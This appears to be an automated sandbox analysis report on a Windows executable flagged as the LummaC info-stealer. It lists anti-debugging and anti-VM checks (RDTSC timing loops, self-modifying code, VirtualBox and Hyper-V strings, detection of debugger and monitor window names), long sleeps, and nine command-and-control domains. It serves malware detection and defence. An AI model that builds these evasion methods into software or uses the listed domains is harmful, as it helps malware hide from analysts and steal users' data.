Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 5300922 second address: 5300946 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF153Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4760DF1540h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 5300946 second address: 530094C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 530094C second address: 5300952 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 5300952 second address: 5300956 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 530096D second address: 53009B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, dx 0x00000006 push ebx 0x00000007 pop eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebp 0x0000000c jmp 00007F4760DF153Ah 0x00000011 mov dword ptr [esp], esi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F4760DF153Dh 0x0000001d adc cx, E616h 0x00000022 jmp 00007F4760DF1541h 0x00000027 popfd 0x00000028 mov cx, D887h 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BB8F4A second address: 6BB8F4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BB8246 second address: 6BB824A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BB824A second address: 6BB8250 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BB83BE second address: 6BB83C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BB852C second address: 6BB8537 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F4760DF9846h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BB8696 second address: 6BB86BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jne 00007F4760DF1536h 0x00000011 jmp 00007F4760DF153Ch 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push edi 0x0000001a pop edi 0x0000001b push edx 0x0000001c pop edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BB86BA second address: 6BB86DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF9859h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BBAD22 second address: 6BBAD2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F4760DF1536h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BBAD2D second address: 6BBAD61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F4760DF9855h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 mov dword ptr [ebp+122D3175h], edi 0x00000019 push 4174DBB0h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BBAD61 second address: 6BBAD67 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BBAEE4 second address: 6BBAEEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BBAEEC second address: 6BBAEF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BBAEF2 second address: 6BBAF76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 add dword ptr [esp], 5CD1F253h 0x0000000d mov dx, cx 0x00000010 push 00000003h 0x00000012 mov dword ptr [ebp+122D1F00h], ecx 0x00000018 add ecx, 75371962h 0x0000001e push 00000000h 0x00000020 push 00000003h 0x00000022 push 00000000h 0x00000024 push ebx 0x00000025 call 00007F4760DF9848h 0x0000002a pop ebx 0x0000002b mov dword ptr [esp+04h], ebx 0x0000002f add dword ptr [esp+04h], 0000001Ch 0x00000037 inc ebx 0x00000038 push ebx 0x00000039 ret 0x0000003a pop ebx 0x0000003b ret 0x0000003c call 00007F4760DF9849h 0x00000041 jno 00007F4760DF985Dh 0x00000047 push eax 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b pushad 0x0000004c popad 0x0000004d jmp 00007F4760DF9851h 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BBAF76 second address: 6BBAFF4 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4760DF1538h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007F4760DF1549h 0x00000015 mov eax, dword ptr [eax] 0x00000017 jmp 00007F4760DF153Ah 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 pushad 0x00000021 jmp 00007F4760DF153Ch 0x00000026 jmp 00007F4760DF1544h 0x0000002b popad 0x0000002c pop eax 0x0000002d movzx edx, di 0x00000030 lea ebx, dword ptr [ebp+12450C12h] 0x00000036 mov di, 3F45h 0x0000003a push eax 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F4760DF1541h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BBB084 second address: 6BBB08A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BBB08A second address: 6BBB094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F4760DF1536h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BBB094 second address: 6BBB129 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4760DF9846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 0ABBF855h 0x00000013 jmp 00007F4760DF9857h 0x00000018 push 00000003h 0x0000001a cmc 0x0000001b sbb si, 963Fh 0x00000020 push 00000000h 0x00000022 or dword ptr [ebp+122D2300h], eax 0x00000028 push 00000003h 0x0000002a and si, F522h 0x0000002f call 00007F4760DF9849h 0x00000034 jmp 00007F4760DF9852h 0x00000039 push eax 0x0000003a jmp 00007F4760DF9858h 0x0000003f mov eax, dword ptr [esp+04h] 0x00000043 jmp 00007F4760DF9855h 0x00000048 mov eax, dword ptr [eax] 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BBB129 second address: 6BBB12E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BBB12E second address: 6BBB134 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BBB134 second address: 6BBB138 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BBB138 second address: 6BBB155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4760DF984Fh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BBB155 second address: 6BBB15B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BBB15B second address: 6BBB15F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BBB15F second address: 6BBB18C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+122D3A03h] 0x0000000f lea ebx, dword ptr [ebp+12450C1Dh] 0x00000015 or cx, B74Ah 0x0000001a jc 00007F4760DF153Ch 0x00000020 sub dword ptr [ebp+122D2ECAh], ebx 0x00000026 push eax 0x00000027 pushad 0x00000028 pushad 0x00000029 pushad 0x0000002a popad 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BBB18C second address: 6BBB194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BCD1ED second address: 6BCD1F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BCD1F3 second address: 6BCD1F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BCD1F8 second address: 6BCD215 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4760DF1540h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BDC65F second address: 6BDC667 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BDC667 second address: 6BDC66D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BA9C17 second address: 6BA9C1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BA9C1B second address: 6BA9C3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F4760DF1549h 0x0000000c jmp 00007F4760DF1543h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BDA7ED second address: 6BDA7F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BDAEC1 second address: 6BDAED7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 jg 00007F4760DF1536h 0x0000000f jng 00007F4760DF1536h 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BDAED7 second address: 6BDAEDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BDB045 second address: 6BDB04D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BDB17F second address: 6BDB189 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4760DF9846h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BDB189 second address: 6BDB1A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F4760DF153Eh 0x0000000c pushad 0x0000000d jo 00007F4760DF1536h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BDB1A8 second address: 6BDB1AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BDB1AE second address: 6BDB1B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BDB1B9 second address: 6BDB1BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BDB1BF second address: 6BDB1C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BDB1C3 second address: 6BDB1C9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BDB322 second address: 6BDB326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BDB326 second address: 6BDB32A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BDB32A second address: 6BDB33E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4760DF153Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BDB33E second address: 6BDB348 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4760DF984Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BDB47D second address: 6BDB483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BDB483 second address: 6BDB4A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4760DF9854h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007F4760DF9846h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BDB4A4 second address: 6BDB4A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BDB746 second address: 6BDB758 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4760DF984Ch 0x00000008 je 00007F4760DF9846h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BDB758 second address: 6BDB75C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BDC099 second address: 6BDC0A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F4760DF9846h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BDC0A3 second address: 6BDC0A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 6BE59DF second address: 6BE59E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Special instruction interceptor: First address: B68FBF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Special instruction interceptor: First address: D1A50A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Special instruction interceptor: First address: DA2955 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Special instruction interceptor: First address: 6A3DD23 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Special instruction interceptor: First address: 6BE5A60 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Special instruction interceptor: First address: 6C0D95C instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\UmotQ1qjLq.exe

Code function: 0_2_06A3DFB6 rdtsc

0_2_06A3DFB6

Source: C:\Users\user\Desktop\UmotQ1qjLq.exe TID: 6600	Thread sleep time: -36018s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe TID: 6480	Thread sleep time: -44022s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe TID: 5940	Thread sleep time: -270000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe TID: 6620	Thread sleep time: -32016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe TID: 2004	Thread sleep time: -42021s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe TID: 6452	Thread sleep time: -40020s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe TID: 6456	Thread sleep time: -38019s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\UmotQ1qjLq.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: UmotQ1qjLq.exe, UmotQ1qjLq.exe, 00000000.00000002.2162656125.00000000068FE000.00000004.00000800.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: UmotQ1qjLq.exe, 00000000.00000003.2073046149.000000000165A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__G
Source: UmotQ1qjLq.exe, 00000000.00000003.1953541147.000000000165A000.00000004.00000020.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1966758838.000000000165A000.00000004.00000020.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1953822700.000000000165F000.00000004.00000020.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1953254503.000000000165A000.00000004.00000020.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1900133376.0000000001660000.00000004.00000020.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.2017085147.000000000165A000.00000004.00000020.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.2073046149.000000000165A000.00000004.00000020.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000002.2158230840.000000000165A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: UmotQ1qjLq.exe, 00000000.00000002.2158230840.0000000001628000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH
Source: UmotQ1qjLq.exe, 00000000.00000002.2162656125.00000000068FE000.00000004.00000800.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\UmotQ1qjLq.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\UmotQ1qjLq.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Thread information set: HideFromDebugger			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: NTICE
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: SICE
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\UmotQ1qjLq.exe

Code function: 0_2_06A3DFB6 rdtsc

0_2_06A3DFB6

Source: C:\Users\user\Desktop\UmotQ1qjLq.exe

Code function: 0_2_00B4D910 LdrInitializeThunk,

0_2_00B4D910

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: UmotQ1qjLq.exe	String found in binary or memory: cloudewahsj.shop
Source: UmotQ1qjLq.exe	String found in binary or memory: noisycuttej.shop
Source: UmotQ1qjLq.exe	String found in binary or memory: rabidcowse.shop
Source: UmotQ1qjLq.exe	String found in binary or memory: framekgirus.shop
Source: UmotQ1qjLq.exe	String found in binary or memory: tirepublicerj.shop
Source: UmotQ1qjLq.exe	String found in binary or memory: abruptyopsn.shop
Source: UmotQ1qjLq.exe	String found in binary or memory: wholersorie.shop
Source: UmotQ1qjLq.exe	String found in binary or memory: fancywaxxers.shop
Source: UmotQ1qjLq.exe	String found in binary or memory: nearycrepso.shop

Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=UmotQ1qjLq.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0			Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=UmotQ1qjLq.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0			Jump to behavior

